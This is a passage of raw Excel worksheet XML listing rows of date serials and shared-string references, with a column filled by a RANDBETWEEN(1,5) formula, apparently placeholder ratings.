      </c>
      <c r="C1904" t="s">
        <v>10</v>
      </c>
      <c r="D1904" t="s">
        <v>374</v>
      </c>
      <c r="E1904" t="s">
        <v>1955</v>
      </c>
      <c r="F1904">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1905" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1905" s="1">
        <v>43522.737337962964</v>
      </c>
      <c r="B1905" t="s">
        <v>19</v>
      </c>
      <c r="C1905" t="s">
        <v>10</v>
      </c>
      <c r="D1905" t="s">
        <v>36</v>
      </c>
      <c r="E1905" s="2" t="s">
        <v>1956</v>
      </c>
      <c r="F1905">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1906" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1906" s="1">
        <v>43522.729050925926</v>
      </c>
      <c r="B1906" t="s">
        <v>19</v>
      </c>
      <c r="C1906" t="s">
        <v>10</v>
      </c>
      <c r="D1906" t="s">
        <v>36</v>
      </c>
      <c r="E1906" s="2" t="s">
        <v>1957</v>
      </c>
      <c r="F1906">
        <f t="shared" ca="1" si="29"/>
        <v>3</v>
      </c>
    </row>
    <row r="1907" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1907" s="1">
        <v>43522.694525462961</v>
      </c>
      <c r="B1907" t="s">
        <v>13</v>
      </c>
      <c r="C1907" t="s">
        <v>6</v>
      </c>
      <c r="D1907" t="s">
        <v>821</v>
      </c>
      <c r="E1907" t="s">
        <v>1958</v>
      </c>
      <c r="F1907">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1908" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1908" s="1">
        <v>43522.656828703701</v>
      </c>
      <c r="B1908" t="s">
        <v>19</v>
      </c>
      <c r="C1908" t="s">
        <v>10</v>
      </c>
      <c r="D1908" t="s">
        <v>92</v>
      </c>
      <c r="E1908" s="2" t="s">
        <v>1959</v>
      </c>
      <c r="F1908">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1909" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1909" s="1">
        <v>43522.650925925926</v>
      </c>
      <c r="B1909" t="s">
        <v>5</v>
      </c>
      <c r="C1909" t="s">
        <v>6</v>
      </c>
      <c r="D1909" t="s">
        <v>25</v>
      </c>
      <c r="E1909" t="s">
        <v>1960</v>
      </c>
      <c r="F1909">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1910" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1910" s="1">
        <v>43522.633449074077</v>
      </c>
      <c r="B1910" t="s">
        <v>19</v>
      </c>
      <c r="C1910" t="s">
        <v>10</v>
      </c>
      <c r="D1910" t="s">
        <v>263</v>
      </c>
      <c r="E1910" s="2" t="s">
        <v>1961</v>
      </c>
      <c r="F1910">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1911" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1911" s="1">
        <v>43522.616550925923</v>
      </c>
      <c r="B1911" t="s">
        <v>19</v>
      </c>
      <c r="C1911" t="s">
        <v>10</v>
      </c>
      <c r="D1911" t="s">
        <v>36</v>
      </c>
      <c r="E1911" s="2" t="s">
        <v>1962</v>
      </c>
      <c r="F1911">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1912" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1912" s="1">
        <v>43522.60732638889</v>
      </c>
      <c r="B1912" t="s">
        <v>5</v>
      </c>
      <c r="C1912" t="s">
        <v>48</v>
      </c>
      <c r="D1912" t="s">
        <v>312</v>
      </c>
      <c r="E1912" s="2" t="s">
        <v>1963</v>
      </c>
      <c r="F1912">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1913" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A1913" s="1">
        <v>43522.600578703707</v>
      </c>
      <c r="B1913" t="s">
        <v>19</v>
      </c>
      <c r="C1913" t="s">
        <v>10</v>
      </c>
      <c r="D1913" t="s">
        <v>14</v>
      </c>
      <c r="E1913" s="2" t="s">
        <v>1964</v>
      </c>
      <c r="F1913">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1914" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1914" s="1">
        <v>43522.588831018518</v>
      </c>
      <c r="B1914" t="s">
        <v>19</v>
      </c>
      <c r="C1914" t="s">
        <v>10</v>
      </c>
      <c r="D1914" t="s">
        <v>80</v>
      </c>
      <c r="E1914" s="2" t="s">
        <v>1965</v>
      </c>
      <c r="F1914">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1915" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1915" s="1">
        <v>43522.587233796294</v>
      </c>
      <c r="B1915" t="s">
        <v>13</v>
      </c>
      <c r="C1915" t="s">
        <v>10</v>
      </c>
      <c r="D1915" t="s">
        <v>11</v>
      </c>
      <c r="E1915" t="s">
        <v>1966</v>
      </c>
      <c r="F1915">
        <f t="shared" ca="1" si="29"/>
        <v>3</v>
      </c>
    </row>
    <row r="1916" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1916" s="1">
        <v>43522.561122685183</v>
      </c>
      <c r="B1916" t="s">
        <v>19</v>
      </c>
      <c r="C1916" t="s">
        <v>10</v>
      </c>
      <c r="D1916" t="s">
        <v>178</v>
      </c>
      <c r="E1916" s="2" t="s">
        <v>1967</v>
      </c>
      <c r="F1916">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1917" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1917" s="1">
        <v>43522.544930555552</v>
      </c>
      <c r="B1917" t="s">
        <v>5</v>
      </c>
      <c r="C1917" t="s">
        <v>6</v>
      </c>
      <c r="D1917" t="s">
        <v>25</v>
      </c>
      <c r="E1917" s="2" t="s">
        <v>1968</v>
      </c>
      <c r="F1917">
        <f t="shared" ca="1" si="29"/>
        <v>5</v>
      </c>
    </row>
    <row r="1918" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1918" s="1">
        <v>43522.543136574073</v>
      </c>
      <c r="B1918" t="s">
        <v>19</v>
      </c>
      <c r="C1918" t="s">
        <v>10</v>
      </c>
      <c r="D1918" t="s">
        <v>721</v>
      </c>
      <c r="E1918" t="s">
        <v>1969</v>
      </c>
      <c r="F1918">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1919" s="1">
        <v>43522.530856481484</v>
      </c>
      <c r="B1919" t="s">
        <v>5</v>
      </c>
      <c r="C1919" t="s">
        <v>41</v>
      </c>
      <c r="F1919">
        <f t="shared" ca="1" si="29"/>
        <v>4</v>
      </c>
    </row>
    <row r="1920" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1920" s="1">
        <v>43522.520370370374</v>
      </c>
      <c r="B1920" t="s">
        <v>19</v>
      </c>
      <c r="C1920" t="s">
        <v>10</v>
      </c>
      <c r="D1920" t="s">
        <v>6</v>
      </c>
      <c r="E1920" t="s">
        <v>1971</v>
      </c>
      <c r="F1920">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1921" s="1">
        <v>43522.5153587963</v>
      </c>
      <c r="B1921" t="s">
        <v>13</v>
      </c>
      <c r="C1921" t="s">
        <v>10</v>
      </c>
      <c r="D1921" t="s">
        <v>290</v>
      </c>
      <c r="E1921" t="s">
        <v>1972</v>
      </c>
      <c r="F1921">
        <f t="shared" ca="1" si="29"/>
        <v>2</v>
      </c>
    </row>
    <row r="1922" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1922" s="1">
        <v>43522.511145833334</v>
      </c>
      <c r="B1922" t="s">
        <v>13</v>
      </c>
      <c r="C1922" t="s">
        <v>10</v>
      </c>
      <c r="D1922" t="s">
        <v>112</v>
      </c>
      <c r="E1922" t="s">
        <v>1973</v>
      </c>
      <c r="F1922">
        <f t="shared" ref="F1922:F1985" ca="1" si="30">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1923" s="1">
        <v>43522.505254629628</v>
      </c>
      <c r="B1923" t="s">
        <v>19</v>
      </c>
      <c r="C1923" t="s">
        <v>10</v>
      </c>
      <c r="D1923" t="s">
        <v>158</v>
      </c>
      <c r="E1923" t="s">
        <v>1974</v>
      </c>
      <c r="F1923">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1924" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1924" s="1">
        <v>43522.481041666666</v>
      </c>
      <c r="B1924" t="s">
        <v>19</v>
      </c>
      <c r="C1924" t="s">
        <v>344</v>
      </c>
      <c r="E1924" s="2" t="s">
        <v>1975</v>
      </c>
      <c r="F1924">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1925" s="1">
        <v>43522.478483796294</v>
      </c>
      <c r="B1925" t="s">
        <v>19</v>
      </c>
      <c r="C1925" t="s">
        <v>10</v>
      </c>
      <c r="D1925" t="s">
        <v>11</v>
      </c>
      <c r="E1925" t="s">
        <v>1976</v>
      </c>
      <c r="F1925">
        <f t="shared" ca="1" si="30"/>
        <v>2</v>
      </c>
    </row>
    <row r="1926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1926" s="1">
        <v>43522.476493055554</v>
      </c>
      <c r="B1926" t="s">
        <v>13</v>
      </c>
      <c r="C1926" t="s">
        <v>10</v>
      </c>
      <c r="E1926" t="s">
        <v>1977</v>
      </c>
      <c r="F1926">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1927" s="1">
        <v>43522.476273148146</v>
      </c>
      <c r="B1927" t="s">
        <v>19</v>
      </c>
      <c r="C1927" t="s">
        <v>10</v>
      </c>
      <c r="D1927" t="s">
        <v>112</v>
      </c>
      <c r="E1927" t="s">
        <v>1978</v>
      </c>
      <c r="F1927">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1928" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1928" s="1">
        <v>43522.474629629629</v>
      </c>
      <c r="B1928" t="s">
        <v>19</v>
      </c>
      <c r="C1928" t="s">
        <v>6</v>
      </c>
      <c r="D1928" t="s">
        <v>25</v>
      </c>
      <c r="E1928" t="s">
        <v>1979</v>
      </c>
      <c r="F1928">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1929" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1929" s="1">
        <v>43522.457650462966</v>
      </c>
      <c r="B1929" t="s">
        <v>19</v>
      </c>
      <c r="C1929" t="s">
        <v>260</v>
      </c>
      <c r="E1929" s="2" t="s">
        <v>1980</v>
      </c>
      <c r="F1929">
        <f t="shared" ca="1" si="30"/>
        <v>2</v>
      </c>
    </row>
    <row r="1930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1930" s="1">
        <v>43522.451168981483</v>
      </c>
      <c r="B1930" t="s">
        <v>19</v>
      </c>
      <c r="C1930" t="s">
        <v>10</v>
      </c>
      <c r="D1930" t="s">
        <v>89</v>
      </c>
      <c r="E1930" t="s">
        <v>1981</v>
      </c>
      <c r="F1930">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1931" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1931" s="1">
        <v>43522.438252314816</v>
      </c>
      <c r="B1931" t="s">
        <v>19</v>
      </c>
      <c r="C1931" t="s">
        <v>10</v>
      </c>
      <c r="D1931" t="s">
        <v>52</v>
      </c>
      <c r="E1931" s="2" t="s">
        <v>1982</v>
      </c>
      <c r="F1931">
        <f t="shared" ca="1" si="30"/>
        <v>2</v>
      </c>
    </row>
    <row r="1932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1932" s="1">
        <v>43522.431030092594</v>
      </c>
      <c r="B1932" t="s">
        <v>19</v>
      </c>
      <c r="C1932" t="s">
        <v>10</v>
      </c>
      <c r="D1932" t="s">
        <v>52</v>
      </c>
      <c r="E1932" t="s">
        <v>1983</v>
      </c>
      <c r="F1932">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1933" s="1">
        <v>43522.41306712963</v>
      </c>
      <c r="B1933" t="s">
        <v>5</v>
      </c>
      <c r="C1933" t="s">
        <v>10</v>
      </c>
      <c r="D1933" t="s">
        <v>20</v>
      </c>
      <c r="E1933" t="s">
        <v>1984</v>
      </c>
      <c r="F1933">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1934" s="1">
        <v>43522.409953703704</v>
      </c>
      <c r="B1934" t="s">
        <v>5</v>
      </c>
      <c r="C1934" t="s">
        <v>48</v>
      </c>
      <c r="E1934" t="s">
        <v>1985</v>
      </c>
      <c r="F1934">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1935" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1935" s="1">
        <v>43522.397094907406</v>
      </c>
      <c r="B1935" t="s">
        <v>19</v>
      </c>
      <c r="C1935" t="s">
        <v>10</v>
      </c>
      <c r="D1935" t="s">
        <v>107</v>
      </c>
      <c r="E1935" s="2" t="s">
        <v>1986</v>
      </c>
      <c r="F1935">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1936" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1936" s="1">
        <v>43522.390763888892</v>
      </c>
      <c r="B1936" t="s">
        <v>19</v>
      </c>
      <c r="C1936" t="s">
        <v>841</v>
      </c>
      <c r="E1936" t="s">
        <v>1987</v>
      </c>
      <c r="F1936">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1937" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1937" s="1">
        <v>43522.380856481483</v>
      </c>
      <c r="B1937" t="s">
        <v>19</v>
      </c>
      <c r="C1937" t="s">
        <v>65</v>
      </c>
      <c r="E1937" s="2" t="s">
        <v>1988</v>
      </c>
      <c r="F1937">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1938" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1938" s="1">
        <v>43522.372650462959</v>
      </c>
      <c r="B1938" t="s">
        <v>13</v>
      </c>
      <c r="C1938" t="s">
        <v>10</v>
      </c>
      <c r="D1938" t="s">
        <v>222</v>
      </c>
      <c r="E1938" t="s">
        <v>1989</v>
      </c>
      <c r="F1938">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1939" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A1939" s="1">
        <v>43522.361018518517</v>
      </c>
      <c r="B1939" t="s">
        <v>19</v>
      </c>
      <c r="C1939" t="s">
        <v>67</v>
      </c>
      <c r="E1939" s="2" t="s">
        <v>1990</v>
      </c>
      <c r="F1939">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1940" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1940" s="1">
        <v>43522.336099537039</v>
      </c>
      <c r="B1940" t="s">
        <v>13</v>
      </c>
      <c r="C1940" t="s">
        <v>16</v>
      </c>
      <c r="E1940" s="2" t="s">
        <v>1991</v>
      </c>
      <c r="F1940">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1941" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A1941" s="1">
        <v>43522.318043981482</v>
      </c>
      <c r="B1941" t="s">
        <v>35</v>
      </c>
      <c r="C1941" t="s">
        <v>1992</v>
      </c>
      <c r="D1941" t="s">
        <v>1993</v>
      </c>
      <c r="E1941" s="2" t="s">
        <v>1994</v>
      </c>
      <c r="F1941">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1942" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1942" s="1">
        <v>43522.315254629626</v>
      </c>
      <c r="B1942" t="s">
        <v>1305</v>
      </c>
      <c r="C1942" t="s">
        <v>408</v>
      </c>
      <c r="F1942">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1943" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1943" s="1">
        <v>43522.301736111112</v>
      </c>
      <c r="B1943" t="s">
        <v>13</v>
      </c>
      <c r="C1943" t="s">
        <v>48</v>
      </c>
      <c r="E1943" t="s">
        <v>1995</v>
      </c>
      <c r="F1943">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1944" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1944" s="1">
        <v>43522.297291666669</v>
      </c>
      <c r="B1944" t="s">
        <v>5</v>
      </c>
      <c r="C1944" t="s">
        <v>71</v>
      </c>
      <c r="E1944" t="s">
        <v>1996</v>
      </c>
      <c r="F1944">
        <f t="shared" ca="1" si="30"/>
        <v>2</v>
      </c>
    </row>
    <row r="1945" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1945" s="1">
        <v>43522.294583333336</v>
      </c>
      <c r="B1945" t="s">
        <v>35</v>
      </c>
      <c r="C1945" t="s">
        <v>71</v>
      </c>
      <c r="E1945" s="2" t="s">
        <v>1997</v>
      </c>
      <c r="F1945">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1946" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1946" s="1">
        <v>43522.293333333335</v>
      </c>
      <c r="B1946" t="s">
        <v>19</v>
      </c>
      <c r="C1946" t="s">
        <v>41</v>
      </c>
      <c r="E1946" t="s">
        <v>1998</v>
      </c>
      <c r="F1946">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1947" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1947" s="1">
        <v>43522.276944444442</v>
      </c>
      <c r="B1947" t="s">
        <v>13</v>
      </c>
      <c r="C1947" t="s">
        <v>48</v>
      </c>
      <c r="E1947" t="s">
        <v>1999</v>
      </c>
      <c r="F1947">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1948" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1948" s="1">
        <v>43522.257268518515</v>
      </c>
      <c r="B1948" t="s">
        <v>35</v>
      </c>
      <c r="C1948" t="s">
        <v>41</v>
      </c>
      <c r="E1948" s="2" t="s">
        <v>2000</v>
      </c>
      <c r="F1948">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1949" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1949" s="1">
        <v>43522.234155092592</v>
      </c>
      <c r="B1949" t="s">
        <v>13</v>
      </c>
      <c r="C1949" t="s">
        <v>48</v>
      </c>
      <c r="E1949" s="2" t="s">
        <v>2001</v>
      </c>
      <c r="F1949">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1950" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1950" s="1">
        <v>43522.219918981478</v>
      </c>
      <c r="B1950" t="s">
        <v>19</v>
      </c>
      <c r="C1950" t="s">
        <v>471</v>
      </c>
      <c r="E1950" s="2" t="s">
        <v>2002</v>
      </c>
      <c r="F1950">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1951" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1951" s="1">
        <v>43522.218645833331</v>
      </c>
      <c r="B1951" t="s">
        <v>13</v>
      </c>
      <c r="C1951" t="s">
        <v>41</v>
      </c>
      <c r="E1951" s="2" t="s">
        <v>2003</v>
      </c>
      <c r="F1951">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1952" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1952" s="1">
        <v>43522.214409722219</v>
      </c>
      <c r="B1952" t="s">
        <v>5</v>
      </c>
      <c r="C1952" t="s">
        <v>41</v>
      </c>
      <c r="E1952" t="s">
        <v>2004</v>
      </c>
      <c r="F1952">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1953" s="1">
        <v>43522.214421296296</v>
      </c>
      <c r="B1953" t="s">
        <v>5</v>
      </c>
      <c r="C1953" t="s">
        <v>41</v>
      </c>
      <c r="E1953" t="s">
        <v>2004</v>
      </c>
      <c r="F1953">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1954" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1954" s="1">
        <v>43522.209907407407</v>
      </c>
      <c r="B1954" t="s">
        <v>13</v>
      </c>
      <c r="C1954" t="s">
        <v>71</v>
      </c>
      <c r="E1954" s="2" t="s">
        <v>2005</v>
      </c>
      <c r="F1954">
        <f t="shared" ca="1" si="30"/>
        <v>2</v>
      </c>
    </row>
    <row r="1955" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1955" s="1">
        <v>43522.209537037037</v>
      </c>
      <c r="B1955" t="s">
        <v>19</v>
      </c>
      <c r="C1955" t="s">
        <v>65</v>
      </c>
      <c r="E1955" s="2" t="s">
        <v>2006</v>
      </c>
      <c r="F1955">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1956" s="1">
        <v>43522.200543981482</v>
      </c>
      <c r="B1956" t="s">
        <v>19</v>
      </c>
      <c r="C1956" t="s">
        <v>41</v>
      </c>
      <c r="E1956" t="s">
        <v>2007</v>
      </c>
      <c r="F1956">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1957" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1957" s="1">
        <v>43522.200358796297</v>
      </c>
      <c r="B1957" t="s">
        <v>19</v>
      </c>
      <c r="C1957" t="s">
        <v>41</v>
      </c>
      <c r="E1957" t="s">
        <v>2007</v>
      </c>
      <c r="F1957">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1958" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1958" s="1">
        <v>43522.196631944447</v>
      </c>
      <c r="B1958" t="s">
        <v>5</v>
      </c>
      <c r="C1958" t="s">
        <v>65</v>
      </c>
      <c r="E1958" s="2" t="s">
        <v>2008</v>
      </c>
      <c r="F1958">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1959" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A1959" s="1">
        <v>43522.190844907411</v>
      </c>
      <c r="B1959" t="s">
        <v>5</v>
      </c>
      <c r="C1959" t="s">
        <v>50</v>
      </c>
      <c r="E1959" s="2" t="s">
        <v>2009</v>
      </c>
      <c r="F1959">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1960" s="1">
        <v>43522.185370370367</v>
      </c>
      <c r="B1960" t="s">
        <v>1305</v>
      </c>
      <c r="C1960" t="s">
        <v>10</v>
      </c>
      <c r="D1960" t="s">
        <v>993</v>
      </c>
      <c r="E1960" t="s">
        <v>1436</v>
      </c>
      <c r="F1960">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1961" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1961" s="1">
        <v>43522.169432870367</v>
      </c>
      <c r="B1961" t="s">
        <v>5</v>
      </c>
      <c r="C1961" t="s">
        <v>10</v>
      </c>
      <c r="E1961" s="2" t="s">
        <v>2010</v>
      </c>
      <c r="F1961">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1962" s="1">
        <v>43522.160729166666</v>
      </c>
      <c r="B1962" t="s">
        <v>19</v>
      </c>
      <c r="C1962" t="s">
        <v>124</v>
      </c>
      <c r="E1962" t="s">
        <v>2011</v>
      </c>
      <c r="F1962">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1963" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1963" s="1">
        <v>43522.143159722225</v>
      </c>
      <c r="B1963" t="s">
        <v>1305</v>
      </c>
      <c r="C1963" t="s">
        <v>41</v>
      </c>
      <c r="D1963" t="s">
        <v>41</v>
      </c>
      <c r="E1963" s="2" t="s">
        <v>2012</v>
      </c>
      <c r="F1963">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1964" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1964" s="1">
        <v>43522.135891203703</v>
      </c>
      <c r="B1964" t="s">
        <v>35</v>
      </c>
      <c r="C1964" t="s">
        <v>65</v>
      </c>
      <c r="E1964" s="2" t="s">
        <v>2013</v>
      </c>
      <c r="F1964">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1965" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1965" s="1">
        <v>43522.128888888888</v>
      </c>
      <c r="B1965" t="s">
        <v>5</v>
      </c>
      <c r="C1965" t="s">
        <v>41</v>
      </c>
      <c r="E1965" s="2" t="s">
        <v>2014</v>
      </c>
      <c r="F1965">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1966" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1966" s="1">
        <v>43522.093807870369</v>
      </c>
      <c r="B1966" t="s">
        <v>19</v>
      </c>
      <c r="C1966" t="s">
        <v>6</v>
      </c>
      <c r="D1966" t="s">
        <v>821</v>
      </c>
      <c r="E1966" s="2" t="s">
        <v>2015</v>
      </c>
      <c r="F1966">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1967" s="1">
        <v>43521.976759259262</v>
      </c>
      <c r="B1967" t="s">
        <v>13</v>
      </c>
      <c r="C1967" t="s">
        <v>229</v>
      </c>
      <c r="E1967" t="s">
        <v>2016</v>
      </c>
      <c r="F1967">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1968" s="1">
        <v>43521.947893518518</v>
      </c>
      <c r="B1968" t="s">
        <v>13</v>
      </c>
      <c r="C1968" t="s">
        <v>10</v>
      </c>
      <c r="D1968" t="s">
        <v>56</v>
      </c>
      <c r="E1968" t="s">
        <v>2017</v>
      </c>
      <c r="F1968">
        <f t="shared" ca="1" si="30"/>
        <v>2</v>
      </c>
    </row>
    <row r="1969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1969" s="1">
        <v>43521.890798611108</v>
      </c>
      <c r="B1969" t="s">
        <v>19</v>
      </c>
      <c r="C1969" t="s">
        <v>10</v>
      </c>
      <c r="D1969" t="s">
        <v>6</v>
      </c>
      <c r="E1969" t="s">
        <v>2018</v>
      </c>
      <c r="F1969">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1970" s="1">
        <v>43521.859907407408</v>
      </c>
      <c r="B1970" t="s">
        <v>5</v>
      </c>
      <c r="C1970" t="s">
        <v>10</v>
      </c>
      <c r="D1970" t="s">
        <v>46</v>
      </c>
      <c r="E1970" t="s">
        <v>2019</v>
      </c>
      <c r="F1970">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1971" s="1">
        <v>43521.850092592591</v>
      </c>
      <c r="B1971" t="s">
        <v>13</v>
      </c>
      <c r="C1971" t="s">
        <v>41</v>
      </c>
      <c r="E1971" t="s">
        <v>2020</v>
      </c>
      <c r="F1971">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1972" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1972" s="1">
        <v>43521.795104166667</v>
      </c>
      <c r="B1972" t="s">
        <v>5</v>
      </c>
      <c r="C1972" t="s">
        <v>10</v>
      </c>
      <c r="D1972" t="s">
        <v>374</v>
      </c>
      <c r="E1972" s="2" t="s">
        <v>2021</v>
      </c>
      <c r="F1972">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1973" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1973" s="1">
        <v>43521.753101851849</v>
      </c>
